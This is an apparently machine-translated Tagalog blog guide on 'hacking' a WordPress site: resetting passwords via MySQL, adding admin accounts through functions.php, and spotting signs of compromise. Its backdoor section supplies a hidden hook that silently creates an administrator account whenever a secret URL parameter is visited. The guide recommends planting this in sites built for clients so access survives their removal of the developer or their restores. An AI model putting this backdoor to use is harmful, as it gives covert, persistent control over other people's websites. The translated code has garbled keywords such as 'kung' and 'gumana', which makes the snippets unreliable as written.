Paano mag-hack sa isang WordPress Website, Ang Kumpletong Gabay

Paano mag-hack sa isang website ng WordPress, ang kumpletong gabay


Hindi namin kinukunsinti, sinasang-ayunan o hinihikayat ang anumang ilegal o nakakahamak na pag-uugali! Ang layunin ng artikulong ito ay upang ipaliwanag kung paano i-hack o makuha muli ang pag-access sa isang site ng WordPress na pagmamay-ari mo, o mayroon kang mga karapatan na i-edit, admin at pag-access. Kahit anong gawin mo, ginagawa mo mismo. Hindi kami mananagot para sa iyong mga aksyon. Ang gabay na ito ay nagsisilbi lamang para sa mga layuning pang-edukasyon.

Ang mga inilarawang pamamaraan ay tutulong sa iyo na makuha muli ang pag-access sa site kahit na wala ka nang account, ngunit mangangailangan ng ilang impormasyon tungkol sa site at hindi ka nila tutulungan na mag-hack sa anumang random na pag-install ng WordPress.

Sa gabay na ito, ipapakita namin sa iyo:

  • Paano mag-hack sa isang website ng WordPress
  • Paano lumikha ng isang backdoor sa WordPress
  • Paano lumikha ng isang bagong account sa gumagamit sa pamamagitan ng FTP
  • 10 mga palatandaan na ang iyong WordPress site ay na-hack

Paano mag-hack sa isang website ng WordPress, ang kumpletong gabay

Mga sitwasyon maaari mong tulungan ang iyong sarili sa

Kung nasa isa ka sa mga sumusunod na sitwasyon, tutulungan ka ng aming mga pamamaraan na makuha mo ang pag-access:

  • nakalimutan mo ang username o email address
  • ang pagpipilian ng pag-reset ng password ay hindi gumagana sa hosting server
  • ang mga email sa pag-reset ng password ay hindi dumarating
  • wala ka nang access sa email address ng account
  • alam mo ang username at password, ngunit ang kumbinasyon ay hindi gagana

Upang magamit ang mga pamamaraan na inilarawan sa ibaba, kakailanganin mo isa lamang sa mga sumusunod:

  • Pag-access sa FTP sa server, o
  • cPanel access sa server, o
  • pag-access sa database ng MySQL at ang kakayahang kumonekta dito nang malayuan

Paraan # 1 – ang paraan ng MySQL

Gamitin ang pamamaraang ito upang mabago ang password (o username kung kinakailangan) ng isang umiiral na gumagamit o upang lumikha ng isang bagong account. Kakailanganin mo ang pag-access ng cPanel o idirekta ang pag-access sa MySQL sa database ng site. Magsimula tayo sa pamamagitan ng pagbabago ng password ng isang umiiral na gumagamit.

Kung gumagamit ka ng cPanel, ang pag-login (cPanel ay maaaring palaging mai-access sa pamamagitan ng https://yoursite.com:2083 link), hanapin at buksan ang phpMyAdmin. Ang listahan ng mga database at mga talahanayan ay nasa kaliwa. Naghahanap ka ng mesa na nagtatapos sa _users. Ito ay marahil wp_users, ngunit kung mayroon kang higit sa isang WordPress site na naka-install sa server, kailangan mong hanapin ang tama.

Ang tamang talahanayan ay magkakaroon ng gumagamit na nais mong i-edit dito. Sundin ang parehong pamamaraan kung nakakonekta ka sa MySQL sa pamamagitan ng ilang panlabas na kliyente SQLyog. Kapag nahanap mo ang talahanayan at ang aktwal na rekord ng gumagamit, oras na upang baguhin ang password.

Tulad ng iyong nalalaman ngayon, ang password ay nai-save sa user_pass larangan, hashed gamit ang MD5 algorithm. Buksan ang online na MD5 generator ipasok ang password na nais mong gamitin at i-click ang “Hash”. Kopyahin ang nabuo na string at palitan ang orihinal na password kasama. Sa phpMyAdmin, maaari mong mai-edit ang patlang sa pamamagitan ng pag-double click dito. Ang pamamaraan ay katulad sa iba pang mga kliyente ng MySQL. I-save ang mga pagbabago at pag-login sa WordPress gamit ang iyong bagong password.

Ang talahanayan ng mga gumagamit ng WP

Ang mga username, hashed password at email ay naka-imbak sa wp_users talahanayan ng database

Pa rin sa pamamaraan # 1 – paglikha ng isang bagong gumagamit

Ang paglikha ng isang bagong gumagamit ay medyo mas kumplikado ngunit mapapamahalaan pa rin ng mas mababa sa isang minuto. Lumikha ng isang bagong tala sa talahanayan ng mga gumagamit at populasyon: user_login, user_pass (hashed, gamit ang MD5 function na inilarawan sa itaas) at user_email. Ang lahat ng iba pang mga patlang ay maaaring manatiling walang laman; hindi sila mahalaga. I-save ang bagong tala. Kapag nai-save, bibigyan ito ng MySQL ng isang natatanging ID. Ito ang numero sa patlang ng ID. Tandaan mo.

Pumunta ka na ngayon _usermeta lamesa. Tandaan, ang prefix ng talahanayan ay dapat na katulad ng isa sa mga gumagamit. Halimbawa wp_users at wp_usersmeta. Kung ang prefix ay hindi pareho, na-edit mo ang maling talahanayan (ng ilang iba pang pag-install ng WP) at hindi gagana ang bagong account. Gumawa kami ng dalawang bagong tala. Huwag pansinin ang umeta_id bukid para sa kanilang dalawa. Itakda user_id patlang sa halagang natatandaan mo lamang (ang bagong halaga ng ID sa talahanayan ng mga gumagamit). Para sa unang set ng record meta_key sa wpct_user_level at meta_value sa 10. Para sa pangalawa meta_key sa wpct_capability at meta_value sa a: 1: {s: 13: "tagapangasiwa"; b: 1;}. I-save ang pareho. Tapos ka na – mag-login!

Paraan # 2 – paraan ng pag-andar.php

Ang pamamaraang ito ay maaaring magamit alinman sa pamamagitan ng pag-edit ng mga function.php sa pamamagitan ng cPanel o sa pamamagitan ng paggamit ng isang FTP client upang gawin ito. Kung gumagamit ng cPanel hanapin ang File Manager at buksan ito. Una, kailangan nating hanapin ang folder ng aktibong tema.

Pumunta sa public_html / wp_content / mga tema folder. Kung nakita mo kaagad ang iyong tema at alam kung alin ito – mahusay. Buksan ang folder nito at simulan ang pag-edit function.php. Kung hindi, buksan ang site, mag-right click kahit saan, piliin ang “Tingnan ang mapagkukunan”. Pagkatapos ay pindutin ang Ctrl + F at simulang mag-type / tema / sa lalong madaling panahon magkakaroon ka ng maraming mga URL na naka-highlight, at makikilala mo ang pangalan ng folder ng aktibong tema.

Hanapin ito sa istraktura ng file, buksan, at simulan ang pag-edit function.php. Kopyahin / ilagay ang sumusunod na code sa dulo ng file. Isipin ang pagsasara ?> Mga tag ng PHP kung mayroon ka nito. Kailangang sila ay nasa huling linya. Kaya ipasok ang code sa harap nila.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

kung (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = bagong WP_User ($ user_id);
$ user-> set_role ('tagapangasiwa');
}

I-edit lamang ang unang dalawang linya ng code upang ipakita ang iyong bagong account. Kung mayroon nang gumagamit sa WP kasama ang email na iyon ay hindi nilikha ang isang bagong account, siguraduhin na bago ito. Baguhin din ang password – hindi mai-hack ng mga kiddies ng script. Matapos buksan ang file na buksan lamang ang iyong site, tatakbo ang code, isang bagong account na may mga pribilehiyo ng administrator ay nilikha at magagawa mong mag-login dito.

Matapos mong gawin ito, tandaan na tanggalin ang code mula sa function.php.

Iba pang mga pamamaraan ng pag-hack

Sa pamamagitan ng pag-alam sa FTP, cPanel o MySQL password ay napatunayan mo na mayroon kang lehitimong pag-access mismo sa server at samakatuwid ay dapat ding magkaroon ng pag-access sa mga (pag-install ng WordPress). Kung wala kang alinman sa mga account na iyon, wala kang kabutihan (pag-hack sa ibang mga site ng mga tao), at hindi maganda iyon!

Mangyaring tandaan na ang pagkakaroon ng di-awtorisadong pag-access sa anumang mga computer, site o server ay isang malubhang krimen at agad na kinakausap sa karamihan ng mga bansa.

Kung natatakot ka na ang iyong WordPress site ay maaaring mai-hack, mangyaring suriin ang pahinang ito gamit ang libreng scanner ng seguridad ng WordPress. Kung wala kang oras upang mai-set up ang iyong blog, gawin namin ito para sa iyo.

Paano lumikha ng isang backdoor sa WordPress

Kapag nakasara ang pintuan sa harap, maaari mong subukan ang pintuan sa likuran. Ito ay maaaring tunog tulad ng isang nakakahamak na paraan ng paggamit ng code para sa pagpasok ng site nang walang pagkakaroon ng access dito, ngunit may mga talagang mga oras kung kailan kailangan mong kontrolin ang iyong sariling site kung may nagnanakaw dito..

Kung lumilikha ito ng mga website para sa ibang tao ng isang bagay na gagawin mo, sa madaling panahon ay mayroong isang kliyente na tatangging bayaran ka para sa iyong trabaho; isang kliyente na tatanggalin ang iyong impormasyon sa pag-login at kontrolin ang lahat ng iyong nagawa. Minsan, sapat na upang lumikha ng isang bagong gumagamit sa pamamagitan ng FTP o upang i-reset ang isang password. Kapag hindi iyon sapat, baka gusto mong i-hack ang iyong paraan pabalik o lumikha ng isang backdoor access sa iyong mga pahina ng admin.

Ngunit kung nagpasya kang itago ang isang maliit na piraso ng code sa iyong WordPress na kapaligiran, maaari mong i-save ang iyong sarili ng ilang dignidad at makakuha ng pag-access sa WordPress site na may mga pribilehiyo ng administrator. At doon nagsisimula ang mga laro.

Hindi mahalaga kung ilang beses na tinatanggal ng magnanakaw ang iyong impormasyon o nagpanumbalik ng isang backup sa isang server na maaaring pagmamay-ari niya, mayroong isang pagkakataon na hindi niya alam ang anumang tungkol sa mga pagpasok sa backdoor. Kung ginawa niya, marahil ay hindi niya kailangan ang iyong tulong sa pag-set up ng WordPress, tama?

Lumikha ng isang backdoor:

OK, sapat na sa usapan; narito ang isang piraso ng code na kakailanganin mong gawin ang trabaho:

  1. Buksan ang mga function.php file
  2. Kopyahin / Idikit ang sumusunod na code:
  3. add_action ('wp_head', 'wploop_backdoor');
    gumana wploop_backdoor () {
    Kung ($ _GET ['backdoor'] == 'knockknock') {
    nangangailangan ('wp-kasama / registration.php');
    Kung (! Username_exists ('username')) {
    $ user_id = wp_create_user ('pangalan', 'pass');
    $ user = bagong WP_User ($ user_id);
    $ user-> set_role ('tagapangasiwa');
    }
    }
    }
    ?>
  4. I-save ang mga pagbabago

Kung iniwan mo ang code tulad nito, ang dapat mong gawin upang lumikha ng isang bagong admin sa site ay bisitahin http://www.yourdomain.com/?backdoor=knockknock

Matapos ma-load ang pahina, ang iyong bagong username ay “Pangalan” at password “Pumasa”.

Syempre, maaari mong baguhin iyon sa code sa itaas sa pamamagitan ng pagpapalit ng ‘pangalan’ at ‘pass’ sa kahit anong gusto mo. Maaari mo ring baguhin ang link sa iyong likod ng pintuan sa pamamagitan ng pagpapalit ng ‘backdoor’ at / o ‘knockknock’ sa anumang bagay na nakakasama mo.

Subukan ang pagpapaandar – hindi lamang ito ay masaya ngunit makakatulong ito sa iyo sa darating na panahon kung kailan ka gagawa ng isang website para sa isang taong hindi mo lubos na mapagkakatiwalaan. Dapat mo ring i-level up ang iyong mga kasanayan sa WordPress at pag-blog.

Paano lumikha ng isang bagong account sa gumagamit sa pamamagitan ng FTP

Ang paglikha ng mga bagong account sa gumagamit sa WordPress ay napakadali. Bilang isang admin, kailangan mong mag-navigate sa pahina ng admin ng Mga gumagamit kung saan maaari kang lumikha ng isang bagong account para sa anumang papel ng gumagamit. Na maaaring gawin sa loob ng ilang segundo at ang isang bagong nilikha na gumagamit ay maaaring agad na mag-log in gamit ang ibinigay na username at password.

Ngunit ano ang mangyayari kung mawalan ka ng pag-access sa iyong WordPress admin? Ang mga bagay ay maaaring maging mas kumplikado, ngunit huwag mag-alala – mayroon kaming isang function para sa iyo na maaaring makatipid sa buhay ng iyong admin.

Kung tinanggal ng isa pang admin ang iyong account, na tinanggal mo ang lahat ng mga gumagamit mula sa database nang hindi nagkakamali, ginamit ang isang hindi magandang pag-andar na plugin o na-hack, maaari ka pa ring makontrol. Minsan maaari kang makakuha ng access lamang sa iyong FTP server habang ang HTTP ay mawawala sa iyong maabot at kakailanganin mong lumikha ng isang bagong admin. Habang maaaring maging isang bihirang kaso, ang sumusunod na pag-andar ay makakapagtipid sa iyo.

Upang lumikha ng isang bagong account sa labas ng kapaligiran ng admin ng WordPress, ang kailangan mo lamang ay isang pag-access sa FTP sa iyong site. Bilang isang admin, dapat mong magkaroon ng lahat ng kinakailangang impormasyon upang mag-log in sa iyong server at maaari kang mabilis na lumikha ng isang bagong account sa pamamagitan ng paglikha ng isang bagong function sa iyong tema.

Lumikha ng isang bagong account sa gumagamit sa pamamagitan ng FTP:

  1. Buksan ang kliyente ng FTP at kumonekta sa iyong account
  2. Mag-navigate sa wp-content / mga tema
  3. Buksan ang folder ng tema na iyong ginagamit
  4. Maghanap para sa mga function.php file at i-edit ito
  5. Kopyahin at idikit ang sumusunod na pagpapaandar:
  6. function na admin_account () {
    $ user = 'Username';
    $ pass = 'Password';
    $ email = '[email protected]';
    kung (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = bagong WP_User ($ user_id);
    $ user-> set_role ('tagapangasiwa');
    }}
    add_action ('init', 'admin_account');
    
  7. Baguhin ang username, password, at email sa isang natatanging bagay
  8. I-save ang mga pagbabago

Tiyaking natatangi ang username, password at email address na itinakda mo sa pagpapaandar o kung hindi man ang gumana ay hindi gagana nang maayos. Kapag na-save mo ang mga pagbabago, tapos ka na at maaari kang mag-navigate sa iyong panel ng pag-login sa WP. Gumamit ng bagong impormasyon upang mai-log in at sa sandaling na-verify mo ang account, maaari mong tanggalin ang function mula sa file ng function.php.

Ang pag-andar na ipinakita sa itaas ay lumilikha ng isang admin account ngunit madali mong baguhin ito upang lumikha ng isang account sa anumang iba pang papel ng gumagamit. Lamang baguhin ang papel sa 8ika hilera ng code sa editor, may-akda, tagatatag, tagasuskribi o anumang iba pang papel ng gumagamit na iyong nilikha.

Sa kasamaang palad, kung nawala mo ang iyong admin account, nawala mo rin ang lahat ng mga post na nakasulat sa ilalim ng username na iyon. Iyon ang dahilan kung bakit dapat mong laging panatilihin ang isang backup na madali mong makuha. Kung babasahin mo ito habang mayroon kang account sa admin, dalhin ito bilang paalala upang lumikha kaagad ng backup at i-bookmark ang artikulong ito kung sakaling kailangan mong lumikha ng isang account sa labas ng WordPress sa hinaharap.

10 mga palatandaan na ang iyong WordPress site ay na-hack

Ang WordPress ay isang malaking platform sa pag-blog. Mayroong milyon-milyong mga gumagamit at tila ang bilang ay mabilis na lumalaki sa bawat araw. Ang mga tao ay may posibilidad na ilipat ang kanilang mga website na nilikha sa iba pang mga sistema ng pamamahala ng nilalaman sa bukas na sistema ng mapagkukunan nang mas madalas kaysa sa iniisip mo. At, habang ito ay mabuti, nangangahulugan ito na Ilalagay din ng mga hacker ang WordPress sa isang numero ng isang lugar kapag sinusubukang salakayin ang mga random na site.

Karaniwan, kung na-hack ka, malalaman mo agad iyon. Ang iyong site ay magiging hindi maa-access; hindi ka makakapag-log in at kung minsan ang isang hacker ay mag-iiwan pa ng isang mensahe sa harap na pahina. Ngunit mas madalas kaysa sa hindi, baka hindi mo rin napansin na may nagbago. Sa bahaging ito ng artikulo, ipapakita namin sa iyo ang ilang mga palatandaan na maaaring ipakita sa iyo na ang iyong WordPress site ay na-hack at ilang mga solusyon sa problema.

1. Hindi matagumpay na pag-login

Ang tanda na ito ay medyo maliwanag. Kung nagamit mo ang isang username at kumbinasyon ng password nang matagal nang hindi ka nagkakaproblema, maaari kang maging kahina-hinala kung biglang hindi nakilala ng WordPress ang iyong account. Kung ang isang hacker ay kailangang mag-log in sa iyong site, ang mga pagkakataon ay mabilis niyang mababago ang iyong mga pribilehiyo sa admin.

Siguro kailangan niyang baguhin ang iyong password o ganap na tinanggal ang iyong account. Bago ka magsimulang mag-alala matapos ang unang pagkakataon na ang mga mensahe ng WordPress sa iyo tungkol sa hindi tamang username / password, mangyaring isaalang-alang ang katotohanan na maaaring pumasok ka sa isang maling kumbinasyon o na maaari mong nakabukas ang pindutan ng lock lock.

Solusyon: Subukang mabawi ang password sa pamamagitan ng email o gumamit ng isa pang account upang mag-log in. Upang matiyak na mananatili kang naka-login, inirerekumenda namin ang pag-install Pag-login sa Ninja plugin para sa WordPress.

2. Ang nakahahamak na nilalaman ay idinagdag sa iyong site

Ang site ay naglalaman ng isang babala sa malware

Kung sinimulan mong mapansin ang hindi pamilyar na nilalaman sa iyong site, maaari kang magsimulang mag-alala. Kapag nagkakaroon sila ng pagkakataon na ma-access ang iyong admin area, magagawang baguhin ng mga hacker ang iyong core at pareho ang iyong mga tema at mga file ng plugin. Nangangahulugan ito na mabago nila ang anumang nais nila.

Habang ang ilang mga hacker ay mabago ang pagbabago sa mga hitsura ng iyong site at marahil na baybayin mo na na-hack ka, ang iba pa ay magiging mas banayad tungkol dito.

Solusyon: Subukang maghanap ng mga nakatagong nilalaman sa code ng website. Maaaring may mga link sa mga nakakahamak na site ng hacker na nakatanim sa footer ng iyong site, o maaaring mai-install nila ang mga popup na magbubukas sa isang regular na batayan sa iyong mga customer. Gamitin ang Security Ninja upang mai-scan ang iyong site o patuloy na subaybayan ang iyong site para sa mga naturang problema.

3. Kahina-hinalang pagbisita

Kung hindi mo sinusubaybayan ang iyong website, dapat mong simulan ang paggawa nito kaagad. Ang isang simpleng paraan upang gawin ay ang paggamit ng Google Analytics na, bukod sa maraming iba pang mga tampok, ay maaaring magsabi sa iyo kung gaano karaming mga pagbisita ang nakukuha mo at saan nagmumula ang mga pagbisita na iyon. Matapos ang ilang oras, malalaman mo ang iyong website. Nangangahulugan ito na malalaman mo kung saan nagmumula ang mga pagbisita, malalaman mo kapag naglulunsad ka ng isang bagong kampanya at kapag may mga bagong link na promosyon na inilabas sa ligaw.

Ngunit kung bigla mong napansin na ang iyong site ay nakakakuha ng isang malaking bilang ng mga bagong pagbisita mula sa kahina-hinalang domain, nais mong siyasatin ito pa dahil baka mai-hack ang iyong site. Karaniwan, ang ganitong uri ng pagbisita ay magreresulta sa 100% rate ng bounce na nangangahulugang isang pahina lamang ang na-access. Ang mga hacker ay madalas na gumagamit ng mga awtomatikong system na hahantong sa iba pang masamang site sa iyo. Kung ito ba ang masamang code na naisakatuparan sa iyong site o naging bahagi ka ng isang spamming network, maaaring maging seryoso ang mga bagay, at kailangan mong suriin ang iyong site para sa malisyosong code.

Solusyon: Gumamit Mga tool sa Google Webmasters upang makahanap ng mga kahina-hinalang domain

4. Isang biglaang pagbagsak sa trapiko

Ligtas na pag-browse sa katayuan sa site

Hindi tulad ng huling nabanggit na pag-sign ng pag-hack, maaaring alertuhan ka ng isang ito dahil may biglang pagbagsak sa bilang ng mga pagbisita. Sa halip na mag-refer ng mga bagong pagbisita sa iyo, maaaring magpadala ang isang hacker ng mga pagbisita sa iyong site. Maaaring mangyari ito dahil ang isang hacker ay nai-redirect ang iyong site sa isa pa. Ang iba pang dahilan para sa pagkuha ng mas kaunting mga bisita ay na-blacklist ng Google sa iyong site. Ang pagkilos na ito ay magpapakita ng isang mensahe sa bawat gumagamit na maaaring pumili na huwag buksan ang iyong site dahil nahawaan ito.

Solusyon: Gamitin ang Google Ligtas na Katayuan ng Site ng Pag-browse upang suriin kung ang iyong site ay minarkahan bilang hindi ligtas at kasalukuyang mapanganib na bisitahin.

5. Ang mga resulta ng search engine ay kakaiba

Kung hindi mo napansin ang anumang mga pagbabago sa iyong site, ngunit nalaman mong ang mga resulta ng paghahanap sa Google at iba pang mga search engine ay kakaiba (magpakita ng iba’t ibang mga pamagat at iba pang meta-data), maaaring ito ay isang malinaw na pag-sign ng isang hacked site. Maaaring mabago ng isang hacker ang iyong nilalaman sa isang paraan na makikita lamang sa isang dalubhasa. Gayunpaman, makikita ang pagbabago sa mga resulta ng search engine.

Solusyon: Suriin ang iyong site sa Mga tool sa Google Webmasters, at suriin kung ang iyong site ay na-hack na ito libreng online na tool.

6. Hindi ka maaaring magpadala / makatanggap ng mga email

Kapag ang isang hacker ay nakakakuha ng access sa iyong site, malamang na gusto niya gamitin ang iyong server para sa pag-spamming sa iba. Kapag nalaman mong hindi ka maaaring magpadala o makatanggap ng mga bagong email mula sa iyong WordPress, maaari itong isang malinaw na senyales na na-hack ka. Suriin muli ang iyong email, pagkatapos suriin ito sa iyong provider upang matiyak na walang mga pagkakamali.

Solusyon: Subukan ang iyong WordPress pag-andar ng mail gamit ang libreng plugin na ito.

7. Hindi umiiral ang site

Hindi matagpuan ang serber

May mga oras na hindi mai-access ng mga hacker ang iyong site upang magtanim ng malisyosong code, mag-redirect ng mga gumagamit o gamitin ang iyong email para sa spam. Minsan, ang nais nilang gawin ay ang pag-crash ng iyong site. Bihirang, matagumpay na tatanggalin ng isang hacker ang lahat mula sa buong server. Iyon ang dahilan kung bakit mahalaga na i-host mo ang iyong mga file sa isang kilalang kumpanya ng hosting na kukuha ng seguridad at panatilihin din araw-araw o hindi bababa sa lingguhang backup ng iyong website. Isang mabuting kasanayan na gawin mo rin ang iyong sariling mga pag-backup sa pana-panahon upang mabilis na maibalik ang site.

Solusyon: I-install ang isa sa mga pinakamahusay na plugin para sa pamamahala ng backup sa WordPress.

8. Mga kahina-hinalang file

Katulad sa nakakahamak na nilalaman na maaaring maidagdag sa umiiral na mga file, maaaring magtanim ang isang hacker ng mga dagdag na file kahit saan sa loob ng iyong folder ng root. Mahusay na malaman ang iyong paraan sa paligid ng WordPress, ngunit kung hindi ka nakaranas, dapat kang magkaroon ng isang kasangkapan sa seguridad sa iyong pagtatapon na maaaring suriin ang lahat ng iyong mga file at aktibidad. Kamakailan lamang, sinuri namin ang Security Ninja na isang perpektong tool para sa pagsuri sa lahat ng iyong mga file ng WordPress.

Solusyon: Subukang maghanap ng mga file na hindi kabilang sa iyong pag-install ng WordPress. Gumamit ng Security Ninja upang mai-scan ang iyong site nang regular at regular na mahanap ang mga file na iyon. Pagkatapos ay tanggalin ang mga file o alisin ang malisyosong code mula sa mga nahawaang file. Huwag kalimutan ang add-on ng Core Scanner para sa Security Ninja.

9. Mga bagong miyembro

Depende sa iyong site, maaaring ikaw lamang ang makapagdagdag ng mga bagong miyembro. Sa kasong iyon, ang isang email na nagsasabi sa iyo tungkol sa mga bagong rehistradong gumagamit ay maaaring mag-trigger ng isang alarma. Kung mayroong iba pang mga admin na may kakayahang magdagdag ng mga bagong miyembro, suriin sa kanila ang tungkol sa kahina-hinalang aktibidad.

Solusyon: Baguhin ang URL ng pag-login gamit ang isang libreng plugin, limitahan ang pag-access sa iyong pahina ng pag-login sa WordPress sa pamamagitan ng paggamit .htpasswd file at gamitin ang Login Ninja upang maprotektahan ang iyong form sa pag-login sa lahat ng oras.

10. Suriin ang mga naka-iskedyul na kaganapan sa iyong server

Minsan, ang isang hacker ay hindi gagawa ng isang bagay sa iyong website kapag nahanap nila ang kanilang paraan. Sa halip, iiwan nila ang mga nakatakdang mga kaganapan na maaaring makapinsala sa iyong site minsan sa hinaharap. Ang diskarteng ito ay mapanganib dahil ang isang hacker ay maaaring mag-iwan ng walang karanasan na karanasan sa biktima na walang karanasan. Maaaring nahawaan ka at walang nalalaman tungkol dito.

Solusyon: Suriin ang iyong mga trabaho sa CRON sa isang server na iyong ginagamit at tiyaking walang kahina-hinalang nakatakdang gawain.

Pagputol

Inaasahan namin na ang artikulong ito ay makakatulong sa iyo na pamahalaan ang kahit isang mas ligtas na site ng WordPress, at makakatulong ito sa iyo na mabawi muli ang pag-access sa mga masasamang sitwasyon. At kahit na malinis ang iyong site, mangyaring huwag mong bigyan ng gana.
Laging tiyakin na ang iyong blog ay ligtas na maaari itong mangyari. Iminumungkahi namin ang mga plugin ng seguridad para sa WordPress na maaaring makatipid ka sa maraming oras. Gayunpaman, huwag kang gumamit ng hindi ligtas na password, at mag-ingat kapag nag-hack sa iyong sariling site ng WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map